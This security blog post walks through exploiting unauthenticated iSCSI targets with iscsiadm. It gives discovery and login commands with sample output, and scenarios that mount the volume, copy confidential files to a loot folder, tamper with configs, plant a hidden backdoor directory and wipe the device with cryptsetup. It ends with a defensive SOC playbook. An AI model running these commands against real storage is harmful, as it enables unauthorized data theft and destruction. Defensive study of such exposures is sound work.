Introduction
Storage systems are prime targets in modern infrastructure. One common technology used for block storage over IP networks is iSCSI (Internet Small Computer Systems Interface). When misconfigured, iSCSI targets can expose sensitive storage volumes without requiring authentication. This blog post walks through the basics of iSCSI, demonstrates how unauthenticated access can be exploited using the iscsiadm tool, explores detailed attack scenarios with step-by-step execution, and closes with mitigations. Flowcharts, diagrams, and example outputs are included for clarity.
⚠️ Warning: This content is for educational and defensive security purposes only. The actual exploitation proof-of-concept (POC) scripts and live attack payloads are intentionally not included. Attempting these techniques without authorization is illegal and unethical.
Understanding iSCSI
What is iSCSI?
iSCSI allows SCSI commands to be transmitted over TCP/IP (default port 3260).It enables clients (initiators) to connect to remote block devices (targets) as if they were physically attached. Commonly deployed in SAN (Storage Area Networks) and NAS appliances.
iSCSI Architecture Diagram
+------------------+ TCP/IP Network +-------------------+
| Initiator | <--------------------------> | Target |
| (Client Host) | | (Storage Server) |
| - iscsiadm | | - Exposed LUNs |
+------------------+ +-------------------+- Initiator: The client host using
iscsiadm. - Target: The storage system exposing block devices (LUNs).
- IQN: iSCSI Qualified Name, unique identifier for a target.
Security Features
- CHAP authentication (unidirectional or mutual).
- Initiator restrictions (by IQN or IP ACL).
If these are disabled, any host can connect to the target.
Proof of Concept: Exploiting Unauthenticated iSCSI Targets
Tools and Commands Used
iscsiadm: Native Linux tool for discovery, login, and session management.systemctl: To ensure theiscsiddaemon is running.dmesg/lsblk: To confirm attached block devices.
Attack Path Flowchart
Attacker (Initiator)
↓
Discovery (iscsiadm -m discovery)
↓
Unauthenticated Login (iscsiadm --login)
↓
Block Devices Attached (/dev/sdX)
↓
Impact: Read/Write Access to StoragePress enter or click to view image in full size
Step-by-Step Exploitation with Example Outputs
- Start the iSCSI daemon:
sudo systemctl start iscsidExpected output:
[ OK ] Started Login and scanning of iSCSI devices.2. Discovery:
sudo iscsiadm -m discovery -t sendtargets -p 10.xxx.xxx.xxx:3260Expected output:
10.xxx.xxx.xxx:3260,1 pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX3. Login without authentication:
sudo iscsiadm -m node -T pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX -p 10.xxx.xxx.xxx:3260 --loginExpected output:
Logging in to [iface: default, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX, portal: 10.xxx.xxx.xxx,3260]
Login to [pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX] successful.4. Login without authentication:
lsblkExpected output
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 80G 0 disk
└─sda1 8:1 0 80G 0 part /
sdb 8:16 0 250G 0 diskdmesg | grep sd
Expected output:
[ 123.456789] sd 2:0:1:0: [sdb] Attached SCSI disk5. Cleanup:
sudo iscsiadm -m node --logoutall=all
sudo systemctl stop iscsidExpected output:
Logging out of session [sid: 1, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX]
Logout of [sid: 1, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX] successful.Advanced Attack Scenarios: Detailed Steps with Outputs
Scenario A: Data Exfiltration
- Discover and log in as shown above.
- Identify new block device (
/dev/sdb). - Mount it read-only:
sudo mkdir /mnt/iscsi sudo mount -o ro /dev/sdb1 /mnt/iscsiExpected output:
mount: /mnt/iscsi: mounted read-only.4. Copy Sensitive data out:
cp /mnt/iscsi/confidential.db ~/loot/Scenario B: Data Manipulation/Destruction
- Mount writable:
sudo mount /dev/sdb1 /mnt/iscsi2. Modify files:
echo "tampered" > /mnt/iscsi/config.iniScenario C: Persistence Mechanism
- Connect to target.
- Create hidden directory:
mkdir /mnt/iscsi/.backdoor
cp payload.bin /mnt/iscsi/.backdoor/Scenario D: Lateral Movement / Pivoting
- Identify application configs:
ls /mnt/iscsi/app/2. Inject malicious script.
Scenario E: Ransomware Operations
- Encrypt block devices:
sudo cryptsetup luksFormat /dev/sdb- Expected result: Entire block device encrypted
Attack Scenarios Diagram
Discovery → Unauthenticated Login → Device Attachment
↓
┌──────────────┬───────────────┬───────────────┬───────────────┬───────────────┐
↓ ↓ ↓ ↓ ↓
Data Exfil Data Modify Persistence Lateral Move RansomwareFull Attack Chain Simulation Transcript
This transcript shows a continuous example from discovery to mounting sensitive data.
# Start iSCSI daemon
sudo systemctl start iscsid# Discover exposed iSCSI targets
sudo iscsiadm -m discovery -t sendtargets -p 10.xxx.xxx.xxx:3260
10.xxx.xxx.xxx:3260,1 pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX
# Log in without credentials
sudo iscsiadm -m node -T pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX -p 10.xxx.xxx.xxx:3260 --login
Logging in to [iface: default, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX, portal: 10.xxx.xxx.xxx,3260]
Login to [pqn.2000-01.com.synology:RSU-NAS.default-target.cdfd0ab1311] successful.
# Verify block device
lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 80G 0 disk
└─sda1 8:1 0 80G 0 part /
sdb 8:16 0 250G 0 disk
# Mount the new LUN
sudo mkdir /mnt/iscsi
sudo mount /dev/sdb1 /mnt/iscsi
# Access sensitive files
ls /mnt/iscsi
finance.db hr_records/ secrets/
# Copy confidential data
cp /mnt/iscsi/finance.db ~/loot/
# Cleanup
sudo iscsiadm -m node --logoutall=all
Logout of [sid: 1, target: pqn.2000-01.com.synology:RSU-NAS.default-target.cdfdXabXXXX] successful.
sudo systemctl stop iscsid
Defensive Playbook for SOC and Threat Hunters
From a SOC or threat-hunting perspective, defense against unauthenticated iSCSI exposure should focus on visibility, detection, and preventive controls. The following measures go beyond configuration and provide actionable steps for defenders:
- Authentication Enforcement: Continuously validate CHAP or mutual CHAP is enabled on all discovered iSCSI targets. Monitor configuration drift in storage appliances.
- Initiator Restrictions: Maintain an allowlist of approved initiator IQNs and IPs. Alerts should trigger when unrecognized initiators attempt discovery or login.
- Network Segmentation & Monitoring:
- Place storage networks in isolated VLANs.
- Deploy IDS/IPS signatures for iSCSI traffic anomalies (e.g., unexpected discovery requests from non-storage segments).
- Alert on iSCSI traffic crossing unauthorized zones.
- Firewall and NAC Rules: Ensure only storage management hosts can reach TCP/3260. NAC policies should prevent rogue initiators.
- Log Monitoring:
- Collect and parse storage system logs for discovery, login, and session events.
- Correlate with endpoint logs to identify suspicious access attempts.
- Threat Hunting Queries:
- Search for unusual use of
iscsiadmacross Linux endpoints. - Hunt for mounts of new block devices outside standard provisioning workflows.
- Incident Response Preparation:
- Playbooks for rapid logout of unauthorized sessions (
iscsiadm -m node --logoutall=all). - Predefined containment steps such as blocking initiator IPs at the firewall.
Defensive Architecture Flow
[Initiator Attempt] → [Auth & IQN/IP Validation] → [Permitted Target Access]
[Unapproved Initiator] → [SOC Alert] → [Block/Investigate]Conclusion
Unauthenticated iSCSI targets expose organizations to severe risks: data theft, destruction, ransomware, and lateral movement. The attack path is simple, requiring only iscsiadm and basic Linux commands. Organizations must enforce authentication, network segmentation, and strict initiator restrictions to protect storage infrastructure.